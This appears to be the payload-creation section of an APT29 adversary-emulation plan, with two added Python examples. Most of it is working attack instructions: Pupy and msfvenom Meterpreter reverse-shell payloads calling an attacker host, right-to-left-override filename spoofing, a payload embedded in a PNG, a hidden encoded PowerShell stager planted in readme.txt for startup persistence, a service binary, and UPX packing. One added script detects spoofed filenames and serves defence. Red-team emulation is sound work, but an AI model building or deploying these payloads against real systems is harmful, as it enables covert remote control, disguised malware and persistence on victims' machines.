# Payload configs
In
## Create Day 1 Payloads
### 1. CosmicDuke Payload (cod.3aka3.scr)
- Generate a Pupy EC4 callback payload with Pupy's `gen` command:
gen -o cod.3aka3.scr -f client -O windows -A x64 connect -t ec4 --host <attacker IP>:1234
- On the Windows attack platform, rename cod.3aka3.scr by prefixing it with the right-to-left override character (https://redcanary.com/blog/right-to-left-override/):
  - Press the Windows key, type 'Character Map', and open it
  - Scroll to the RTLO character (U+202E)
  - Select the RTLO character, click "Select", then click "Copy"
  - Right-click cod.3aka3.scr, then click "Rename"
  - Move the cursor to the beginning of the filename, press Ctrl-V to paste the RTLO character, and press Enter to save the rename
  - The file should now display as "rcs.3aka3.doc". On disk the name is still cod.3aka3.scr with a leading U+202E, and Windows still treats the file as a .scr; only the rendering is reversed.
Screenshot taken from: https://resources.infosecinstitute.com/spoof-using-right-to-left-override-rtlo-technique-2/
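The rename above done programmatically, together with the check a defender would run over a directory: an added example written for this page, not part of the emulation plan or of Pupy. It creates a stand-in file in a temporary directory (a two-byte placeholder, not the real client), prefixes its name with U+202E exactly as the Character Map steps do, then lists the directory for names carrying bidi control characters and reports what a bidi-aware file browser would display next to the extension the OS actually honours. `displayed_name` handles only the single leading override used here, not the full Unicode bidi algorithm.

```python
"""RTLO filename spoofing and its detection (added example, not part of the
APT29 emulation plan). Works on any OS whose filesystem accepts U+202E in names."""
import os
import tempfile
from typing import Dict, List

RTLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE, the character pasted in via Character Map
# Unicode bidi controls that can reorder how a filename is rendered
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}


def spoofed_name(real_name: str) -> str:
    """Prefix the name with U+202E; the name on disk changes only by that prefix."""
    return RTLO + real_name


def displayed_name(name: str) -> str:
    """Approximate a bidi-aware renderer: everything after a leading override is
    drawn reversed. Enough for the single-override case used in step 1; the full
    Unicode bidi algorithm also handles nesting and pops (U+202C), which this ignores."""
    head, sep, tail = name.partition(RTLO)
    return head + tail[::-1] if sep else name


def real_extension(name: str) -> str:
    """The OS picks the handler from the raw characters, so the extension is
    still .scr no matter how the name is drawn."""
    return os.path.splitext(name)[1]


def find_spoofed(directory: str) -> List[Dict[str, str]]:
    """List entries whose names contain bidi controls: raw name, rendered name,
    and the extension that will actually be executed."""
    findings = []
    for entry in sorted(os.listdir(directory)):
        if any(ch in BIDI_CONTROLS for ch in entry):
            findings.append({
                "raw": entry,
                "displayed": displayed_name(entry),
                "real_extension": real_extension(entry),
            })
    return findings


def demo() -> List[Dict[str, str]]:
    """Recreate step 1 in a scratch directory and scan it."""
    with tempfile.TemporaryDirectory() as scratch:
        original = os.path.join(scratch, "cod.3aka3.scr")
        with open(original, "wb") as fh:
            fh.write(b"MZ")  # constructed placeholder, not the Pupy client
        os.rename(original, os.path.join(scratch, spoofed_name("cod.3aka3.scr")))
        return find_spoofed(scratch)


if __name__ == "__main__":
    for finding in demo():
        print("on disk: %r  shown as: %s  runs as: %s"
              % (finding["raw"], finding["displayed"], finding["real_extension"]))
```

The `find_spoofed` scan is the part worth keeping: a file name that contains any of the bidi control characters is almost never legitimate in a download or mail attachment directory, and the `raw` / `displayed` pair shows the analyst why the user saw a .doc.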
### 2. Privilege Escalation Payload (monkey.png)
Steps to re-create:
- Generate a PowerShell-formatted Meterpreter payload:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<attacker IP> LPORT=443 --format psh -o meterpreter.ps1
- Transfer meterpreter.ps1 to Windows attack platform; embed meterpreter.ps1 into a PNG file using Invoke-PSImage (https://github.com/peewpw/Invoke-PSImage):
Import-Module .\Invoke-PSImage.ps1
Invoke-PSImage -Script .\meterpreter.ps1 -Out .\monkey.png -Image .\monkey.jpg
### 3. Startup Folder Payload (strings64/hostui.exe)
- Generate a PowerShell-formatted Meterpreter command:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<attacker IP> LPORT=443 --format psh-cmd
- Copy the PowerShell one-liner to the clipboard. It should look like:
powershell.exe -nop -w hidden -e aQBmAc...base64 string...KAOwa=
Do not copy the execution preamble (%COMSPEC% /b /c start /b /min) that msfvenom prints before powershell.exe.
- Open payloads/readme.txt and paste the PowerShell Meterpreter blob into line 816. That line should look like:
$javasvc = "powershell.exe -nop -w hidden -e aQBmAc...base64 string...KAOwa="
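The clipboard edit in step 3 as a script: an added example written for this page, not part of the emulation plan. It assumes msfvenom's psh-cmd output is exactly the `%COMSPEC% /b /c start /b /min powershell.exe ...` line quoted above, strips that preamble, decodes the `-e` argument (base64 of UTF-16LE) so the stager can be inspected before it is pasted, and writes the `$javasvc = "..."` assignment to line 816 of a readme.txt-shaped template. The encoded command and the 816-line template are constructed stand-ins, not the real blob or the real readme.txt.

```python
"""Build the `$javasvc` line for payloads/readme.txt from msfvenom psh-cmd output
(added example, not part of the APT29 emulation plan)."""
import base64

# Preamble msfvenom prepends in -f psh-cmd output; step 3 says not to paste it
PREAMBLE = "%COMSPEC% /b /c start /b /min "
PS_PREFIX = "powershell.exe -nop -w hidden -e "


def powershell_oneliner(psh_cmd_output: str) -> str:
    """Return only the powershell.exe ... part of the psh-cmd output."""
    line = psh_cmd_output.strip()
    if line.startswith(PREAMBLE):
        line = line[len(PREAMBLE):]
    if not line.startswith(PS_PREFIX):
        raise ValueError("not msfvenom psh-cmd output: %r" % line[:40])
    if '"' in line:
        raise ValueError("one-liner contains a double quote and would break the template line")
    return line


def decode_encoded_command(oneliner: str) -> str:
    """PowerShell -e takes base64 of a UTF-16LE string; decode it to inspect the stager."""
    b64 = oneliner[len(PS_PREFIX):].strip()
    return base64.b64decode(b64).decode("utf-16-le")


def set_javasvc_line(template: str, oneliner: str, line_no: int = 816) -> str:
    """Replace line `line_no` (1-based) of the template with the $javasvc assignment,
    refusing if that line is not already the $javasvc assignment."""
    lines = template.split("\n")
    if len(lines) < line_no:
        raise ValueError("template has only %d lines" % len(lines))
    idx = line_no - 1
    if not lines[idx].lstrip().startswith("$javasvc"):
        raise ValueError("line %d is %r, not the $javasvc assignment" % (line_no, lines[idx]))
    lines[idx] = '$javasvc = "%s"' % oneliner
    return "\n".join(lines)


# Constructed inputs: a harmless encoded command instead of the Meterpreter stager,
# and an 816-line template with the assignment placeholder where readme.txt has it.
SAMPLE_ENCODED = base64.b64encode("Write-Host stager".encode("utf-16-le")).decode("ascii")
SAMPLE_PSH_CMD = PREAMBLE + PS_PREFIX + SAMPLE_ENCODED + "\n"
SAMPLE_TEMPLATE = "\n".join(["# readme.txt filler line"] * 815
                            + ['$javasvc = ""', "# trailing line"])


def build() -> str:
    """Full step 3: strip the preamble and patch line 816 of the template."""
    oneliner = powershell_oneliner(SAMPLE_PSH_CMD)
    return set_javasvc_line(SAMPLE_TEMPLATE, oneliner)


if __name__ == "__main__":
    patched = build()
    print(patched.split("\n")[815])
    print("decoded stager:", decode_encoded_command(powershell_oneliner(SAMPLE_PSH_CMD)))
```

The line-816 guard matters more than it looks: the readme.txt template is PowerShell, so pasting one line too high or too low silently leaves `$javasvc` empty and the startup-folder payload runs nothing.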
### 4. Persistent Service Payload (javamtsup.exe)
- Generate a Meterpreter service-binary:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<attacker IP> LPORT=443 -f exe-service -o javamtsup.exe
### 5. SeaDuke Payload (python.exe)
- Generate a Python-formatted Meterpreter payload:
msfvenom -p python/meterpreter/reverse_https LHOST=<attacker IP> LPORT=8443 -o python.py
- Transfer python.py to the Windows attack platform
- Compile python.py into a single-file portable executable using PyInstaller (https://pypi.org/project/PyInstaller/):
pyinstaller -F python.py
PyInstaller writes the resulting binary to dist\python.exe.
- Pack the python.exe payload using UPX (https://github.com/upx/upx):
upx --brute python.exe